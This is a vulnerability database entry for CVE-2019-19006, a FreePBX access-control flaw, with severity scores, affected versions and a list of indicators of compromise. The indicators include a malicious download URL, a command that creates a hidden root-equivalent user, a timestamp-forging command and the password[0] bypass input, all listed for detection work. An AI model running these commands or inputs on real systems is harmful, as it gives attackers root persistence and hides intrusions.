cbcvebase.
CVE-2019-19006
published 2019-11-21

CVE-2019-19006: Sangoma FreePBX 115.0.16.26 and below, 14.0.13.11 and below, 13.0.197.13 and below have Incorrect Access Control.

PriorityP186critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITW
CISA Known Exploited Vulnerabilitydue 2026-02-24
Exploited in the wild
EPSS
36.61%
98.3th percentile
Sangoma FreePBX 115.0.16.26 and below, 14.0.13.11 and below, 13.0.197.13 and below have Incorrect Access Control.

Affected

3 ranges
VendorProductVersion rangeFixed in
sangomafreepbx13.0.0.0 – 13.0.197.13
sangomafreepbx14.0.0.0 – 14.0.13.11
sangomafreepbx15.0.0.0 – 15.0.16.26

Detection & IOCsextracted from sources · hover to see the quote

ip45.234.176.202
domaincrm.razatelefonia.pro
urlhttp://45.234.176.202/new/k.php
path/var/www/html/rest_phones/ajax.php
path/var/www/html/admin/modules/core/ajax.php
path/var/www/html/admin/assets/js/config.php
path/var/www/html/admin/views/ajax.php
path/var/www/html/admin/views/.htaccess
path/var/www/html/admin/modules/freepbx_ha/license.php
path/var/lib/asterisk/bin/zen2
path/var/lib/asterisk/bin/devnull2
path/var/lib/asterisk/bin/devnull
path/var/spool/asterisk/tmp/serv
path/var/spool/asterisk/tmp/test.sh
path/etc/freepbx.conf
path/etc/amportal.conf
path/etc/asterisk/sip_additional.conf
commanduseradd -s /bin/bash -ou 0 -g 0 -p '$1$faV63BKr$4jH3MqYYmrpM55P.AWD2U1' newfpbx &>/dev/null
commandtouch /var/www/html/admin/views/ajax.php -r /var/www/html/admin/views/footer.php
otherpassword[0]
  • CVE-2019-19006 exploitation can be detected by monitoring HTTP login requests to FreePBX where the 'password' parameter is sent as an array element (e.g., password[0]=<any_value>), which bypasses authentication by preventing session teardown.
  • Detect EncystPHP web shell presence by scanning for ajax.php files in non-standard FreePBX paths such as /var/www/html/digium_phones/, /var/www/html/phones/, /var/www/html/fpbxphones/, /var/www/html/freepbxphones/, /var/www/html/freepbx/, and /var/www/html/admin/assets/.
  • Alert on creation of a Linux user named 'newfpbx' with UID/GID 0 (root-equivalent), which is a persistence indicator for EncystPHP.
  • Monitor for the MD5-hashed credential check pattern in PHP files on FreePBX hosts; the EncystPHP web shell uses a hard-coded MD5 hash for authentication under an interface titled 'Ask Master'.
  • Detect suspicious crontab entries that repeatedly download k.php from external IPs to /var/lib/asterisk/bin/ paths (zen2, devnull2, devnull), which are persistence indicators for EncystPHP.
  • Check Point IPS signature 'Sangoma FreePBX Authentication Bypass (CVE-2019-19006)' can be used to detect exploitation attempts against vulnerable FreePBX servers.
  • Monitor for SIPVicious svmap scanning activity targeting FreePBX systems, as this tool is used by INJ3CTOR3 to identify vulnerable targets prior to CVE-2019-19006 exploitation.
  • Detect timestamp-forging activity on FreePBX web directories: alert on 'touch' commands referencing ajax.php against legitimate footer.php timestamps, used by EncystPHP to evade detection.
  • ·The EncystPHP campaign described in the Fortinet report exploits CVE-2025-64328, not CVE-2019-19006 directly; the association with CVE-2019-19006 is historical (INJ3CTOR3 threat actor attribution). IOCs from the Fortinet report are operationally linked to the same threat actor but not to the original 2019 CVE exploitation infrastructure.
  • ·The download URL http://45.143.220.116/emo1.sh returned HTTP 404 at time of Check Point Research analysis; its purpose was unknown and the IOC may no longer be active.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.